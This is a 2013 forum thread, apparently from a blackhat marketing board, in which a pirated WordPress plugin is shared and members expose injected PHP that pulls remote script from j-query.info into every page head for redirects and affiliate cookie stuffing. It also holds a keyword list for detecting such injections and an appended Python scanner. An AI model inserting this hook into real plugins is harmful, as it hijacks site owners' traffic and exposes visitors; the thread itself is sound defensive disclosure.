[GET]Wp Stealth Note - "Why I spent $2,240 on tmakes your visitors like you more, gets you more Goog

Discussion in 'Member Downloads' started by cyborgcod, Mar 20, 2013.

  1. cyborgcod

    cyborgcod Banned

    Not even released yet :)
    Enjoy guys.

    Sales Page
    Code:
    http://wpstealthnote.com/
    WSO Page
    Code:
    http://www.warriorforum.com/warrior-special-offers-forum/766265-why-i-spent-2-240-wp-plugin-your-visitors-will-like-you-more-buy-you-more.html
    Download
    Code:
    http://mir.cr/1TDFOBXA
    VT - Clean
    Code:
    https://www.virustotal.com/en/file/85f66bebdfb1ba413b7ad7e11bcd24701f4f49a0eda952f78b428a26e1eb60fb/analysis/1363744981/

    Please say thanks and make mirrors.
    Sharing is caring.
     
    Last edited: Mar 21, 2013
    #1
    ilikeseggs, Creep, GianniP and 27 others like this.
  2. amommy

    amommy Member

    the wso sneak peek
    Code:
    http://www.warriorforum.com/warrior-special-offers-forum/766265-why-i-spent-2-240-wp-plugin-your-visitors-will-like-you-more-buy-you-more.html
     
    Last edited: Mar 20, 2013
    #2
    FMG, incognito87354 and cyborgcod like this.
  3. TZ-

    TZ- Well-Known Member

    Whoever downloaded this plugin is getting traffic redirected from his site to some other site, which is filled with some java packed shit or affiliate codes.

    This is not clean, code from UBHS script is injected.


    Code:
            $url = "http://www.j-query.info/jquery-1.6.3.min.js"; 
            $ch = curl_init();  
            $timeout = 10;  
            curl_setopt($ch,CURLOPT_URL,$url); 
            curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
            curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); 
            $data = curl_exec($ch);  
            curl_close($ch); 
            echo "$data";


    Recently I checked another plugin on another forum and got the source of the actual links and affiliate signatures.

    [​IMG]


    Affiliate links to HostGator and Amazon.

    [​IMG]



    This username cyborgod must be some coincidence, right, cyborgod ?
     
    #3
    ilikeseggs, gaper, hachkay and 23 others like this.
  4. theman

    theman SUPER VIP LIFETIME Jr. VIP

    Wonder if George himself coded this into his plugin? Will have to wait and see what cyborgcod has to say about this one....
     
    #4
  5. cyborgcod

    cyborgcod Banned

    Wow. No idea.
    TZ, you seem to be the coder of Traffik Buster, are you sure you're not involved here somehow?

    I am not a coder, nor do I know anything about it. I scanned the plugin, it was clean.
    My HG aff ID isn't even cyborgcod, so I have no idea.


    EDIT: After just opening the main php file in Dreamweaver, I found that no such reference to my username exists. So no idea how/why I'm implemented here? I just got this from another forum :S

    EDIT2: Removed what TZ said either way, and it still works. Re-updated the download.
     
    Last edited: Mar 21, 2013
    #5
  6. TZ-

    TZ- Well-Known Member

    I am not the coder of TB; I work with PHP and some jQuery/AJAX, while TB is coded for the PC platform.
    What exactly do you want to say, that I am involved here somehow, lol. Just for fun I went through a few of your last shares and plugins; all of them have the same code, and somebody could say that you know very well what I am talking about: UBHS script, affiliate cookie stuffing, etc. ... I can even pull statistics from one plugin download here

    Code:
    https://bitly.com/11Et5Vn+ 
    and see all the sites that installed the plugin (that was the Amazon plugin). I bet that many people here will see and recognize their sites and where it was downloaded.


    This code is in each of the plugins shared by you lately.
    It's not on me to judge whether you injected the code or not; for me it is clear that you did, but that is just my opinion, and whoever has to judge does not give a damn, so whatever.

    Code:
    function jqueryadd_head() {
        if(function_exists('curl_init'))
        {
            $url = "http://www.j-query.info/jquery-1.6.3.min.js"; 
            $ch = curl_init();  
            $timeout = 10;  
            curl_setopt($ch,CURLOPT_URL,$url); 
            curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
            curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); 
            $data = curl_exec($ch);  
            curl_close($ch); 
            echo "$data";
        }
    }
    add_action('wp_head', 'jqueryadd_head');

    Code found in all of those plugins:

    [GET][Rave reviews] (1300+ sold) WP Empire Builder. Launch & manage many blogs from 1 place. Closing soon

    Code:
    http://www.blackhatteam.com/f185/get-rave-reviews-1300-sold-wp-empire-builder-launch-and-manage-many-blogs-from-1-place-closing-soon-89748.html#post636324

    -----------------

    [GET]Azon Profit Poster - 440+ sold. (Rave reviews) WP plugin: More profitable Amazon blogs in just 2 mins (Closing soon)
    Code:
    http://www.blackhatteam.com/f185/get-azon-profit-poster-440-sold-rave-reviews-wp-plugin-more-profitable-amazon-blogs-in-just-2-mins-closing-soon-89751.html#post636328
    -----------------

    [GET]CB Goliath WP Plugin
    Code:
    http://www.blackhatteam.com/f185/get-cb-goliath-wp-plugin-45867.html
    ------------------

    [GET]LAUNCHING 12/02/2013! Ama Search Bar - Why I spent $2,350 on this WP plugin. More Amazon $$$ and traffic (Rave reviews)

    Code:
    http://www.blackhatteam.com/f185/get-launching-12-02-2013-ama-search-bar-why-i-spent-2-350-on-this-wp-plugin-more-amazon-and-traffic-rave-reviews-89750.html
    ---------------

    [GET]Associate Goliath - [Rave reviews] (2300+ sold) - Amazon affiliate blogs in 3 mins. WP plugin

    Code:
    http://www.blackhatteam.com/f185/get-associate-goliath-89734.html#post636206
    --------------

    Screens from statistics, in case that link gets removed

    [​IMG]

    [​IMG]
     
    #6
    ilikeseggs, hachkay, mousyz and 3 others like this.
  7. theman

    theman SUPER VIP LIFETIME Jr. VIP

    Watch out everyone with this code..and all code.......something to watch for in all plugins you DL around the web...thanks for the info
     
    #7
  8. TZ-

    TZ- Well-Known Member

    Domains referring to the code from the plugins; if somebody recognizes their site, they have to remove the code.

     
    #8
    ilikeseggs, trotty, joebio911 and 4 others like this.
  9. TZ-

    TZ- Well-Known Member

    What a small world, looks like someone has a site on the same server as you, this Illuminati thing



    [​IMG]

    [​IMG]

    [​IMG]




    Anyway, this is the new link for stats, directly from
    Code:
    http://www.j-query.info/jquery-1.6.3.min.js
    , going to

    Code:
    xxxxxxxxxxxx


    [​IMG]



    and wow, man, this is not bad, 58,027 clicks on a specific aff id... what a pity it's not yours, you could make a lot of money...



    These are domains that installed the plugin lately...

     
    Last edited by a moderator: Mar 27, 2013
    #9
    ilikeseggs, hachkay, chuckles and 4 others like this.
  10. theman

    theman SUPER VIP LIFETIME Jr. VIP

    Nice work on the issues with the plugin.......never know who you really dealing with huh...thanks for the info
     
    #10
  11. TheOne

    TheOne Active Member

    Hey,

    I was looking at CB Goliath....why would someone say that "Fixed issue with gzip encoding of hxxp://www.2settlemydebt.cOm/ (2SETTLE)
    * 3.0.7* in the main top section of the php code itself?

    Why would you need that?

    Also, where are you finding the codes that were illustrated above?

    Thanks
     
    #11
  12. TZ-

    TZ- Well-Known Member

    Is that a rhetorical question, or are you asking me directly for someone's notes and codes?

    code is in cb_goliath-4.2.7.zip - file cb_goliath.php , very obvious, first part.
     
    #12
  13. TheOne

    TheOne Active Member

    Thank you TZ. I looked in my zip files and fortunately did NOT find these in the php files.

    That is very strange that those that you referred to, started showing up.

    I still am not sure why someone would put: "Fixed issue with gzip encoding of hxxp://www.2settlemydebt.cOm/ (2SETTLE)
    * 3.0.7* in the header of the code.

    Is that the plugin makers site?

    Anyway thank you for alerting us to the injected code.

    I WILL be more diligent in reviewing my files from now on.
     
    #13
    TZ- likes this.
  14. TZ-

    TZ- Well-Known Member

    [​IMG]
     
    #14
  15. dzsindzso

    dzsindzso Well-Known Member

    Thanks TZ for the find. Good thing I never used his shares, but I would probably have missed that code or would never actually check it. Will definitely double check from now on. Nice trick to use the j-query.info domain, makes it harder to notice. Anyway the whois for that domain is not protected so if any of you who downloaded the crap happen to be in HK, give him a call and thank him personally ;)

    Now moderators do the right thing and remove all the threads with the infected stuff and make a note for the ones who downloaded it.
     
    Last edited: Mar 21, 2013
    #15
    TZ- likes this.
  16. dconstrukt

    dconstrukt Active Member

    cmon guys... if you're gonna share shit don't be a fucking douchebag and inject code.... that's so fucking lame and a great way to get your ass beat.

    MODS: I say we INSTA-ban anyone who does this and remove all their posts and shares.
     
    #16
    digitalx, Vivian2468 and TZ- like this.
  17. ninja14

    ninja14 Member

    thank you TZ for this .. really appreciate it .. wanted this plug in and hopefully you discovered the trick before
    Thanks again
     
    #17
    TZ- likes this.
  18. We Go

    We Go Banned

    TYVM! So glad I saw this thread ,.. I was going to start using the empire plugin as soon as I found a cpanel hosting .. looks like I need to search all my drives just in case ....

    what string would you search {Windows search XP} for to best locate the code ?? I am not sure which string is the real tell on these

    TIA!
     
    #18
    TZ- likes this.
  19. TZ-

    TZ- Well-Known Member

    I use something that I coded, a script to upload to the server (or run in XAMPP) that checks all files on it and lists them, and then I do a manual check because many false positives are triggered. I need to sort this list since some of the strings share the same parts, but some of the basic things to check would be:
    Code:
    passthru
    shell_exec
    system(
    phpinfo
    eval(
    base64_decode
    edoced_46esab
    chmod
    mkdir
    ``
    fopen
    fclose
    readfile 
    curl_init
    curl_setopt
    curl_close
    wp_remote_fopen
    “rss_”.md5(
    preg_replace(
    stristr($referer
    !stristr($referer
    stream_context_create(
    preg_match
    header("Location:
    gethostbyname
    file_get_contents("http://
    include(
    include_once(
    require(
    require_once(
    include("http://
    src=http://
    $user_auth
    $userauth
    <iframe
    src=
    src%3D
    src%3d
    http://
    script language=
    unescape
    varchar
    (0x
    sysob
    <script
    char(
    char (
    sysobject
    substring
    declare @
    insert into
    document.write('<iframe src=
    document.write(unescape(
    window.location="http://
    window.location.replace("http://
    <script language="JavaScript" src="http://
    &lt;script type=&quot;text/javascript&quot; src=&quot;http://
    <meta http-equiv="refresh" content=
    <meta http-equiv="location" content=
    <iframe src=
    width="0"
    height="0"
    frameborder="0"
    style="display:none"
    
    
    Also .htaccess needs to be checked; many malicious redirects are done from there.
    Before, I used the free software FileSeek; it is excellent but slow to work with, string by string.
     
    #19
    sharold, dzsindzso, chuckles and 6 others like this.
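
A flat search for the strings listed in post #19 matches almost every plugin, which is the false-positive problem that post describes. As an added example (not code from the thread or from any poster's script), this Python scanner narrows the check to the pattern quoted in posts #3 and #6: a callback hooked into `wp_head` that fetches remote content and prints it into the page. The function names, the inclusion of `wp_footer`, and the abridged sample input are choices made here.

```python
import re
from pathlib import Path

# Page-wide hooks, plus fetch/output primitives from the thread's string list.
HOOK_RE = re.compile(r"add_action\(\s*['\"](wp_head|wp_footer)['\"]\s*,\s*['\"](\w+)['\"]")
FETCH_RE = re.compile(r"\b(curl_exec|file_get_contents|wp_remote_fopen)\s*\(")
OUTPUT_RE = re.compile(r"\b(echo|print)\b")
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")

def function_body(source, name):
    """Return the brace-balanced body of PHP function `name`, or None."""
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\([^)]*\)\s*\{", source)
    if not m:
        return None
    depth, i = 1, m.end()
    while i < len(source) and depth:
        depth += {"{": 1, "}": -1}.get(source[i], 0)
        i += 1
    return source[m.end():i - 1]

def scan_source(source):
    """Report hooked callbacks that fetch remote content and print it."""
    findings = []
    for hook, callback in HOOK_RE.findall(source):
        body = function_body(source, callback)
        if body and FETCH_RE.search(body) and OUTPUT_RE.search(body):
            hosts = sorted(set(URL_RE.findall(body)))
            findings.append({"hook": hook, "callback": callback, "hosts": hosts})
    return findings

def scan_tree(root):
    """Scan every .php file under `root`; returns {path: findings}."""
    hits = {str(p): scan_source(p.read_text(errors="replace"))
            for p in Path(root).rglob("*.php")}
    return {path: found for path, found in hits.items() if found}

# Constructed sample: abridged snippet from the thread plus a benign hook.
SAMPLE = """<?php
function jqueryadd_head() {
    if(function_exists('curl_init')) {
        $url = "http://www.j-query.info/jquery-1.6.3.min.js";
        $data = curl_exec($ch);
        echo "$data";
    }
}
add_action('wp_head', 'jqueryadd_head');
function theme_meta() { echo '<meta name="generator" content="x">'; }
add_action('wp_head', 'theme_meta');
"""
```

Running `scan_tree` over an unpacked plugin directory before installing it returns only the files with such a callback and the hosts it contacts; anything it reports still needs a manual read, and `.htaccess` is outside its scope.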
  20. carson

    carson Well-Known Member

    TZ just wanted to give a big thanks for your diligence in checking this, not that I was going to download/use as I'm very wary of plugins/themes unless I can 100% trust source (know they bought it) or the share is a direct download. Probably like many on BHT, I'm not skilled at finding stuff like this and really appreciate those who can checking it.

    Thanks again :cool:
     
    #20
    TZ- likes this.
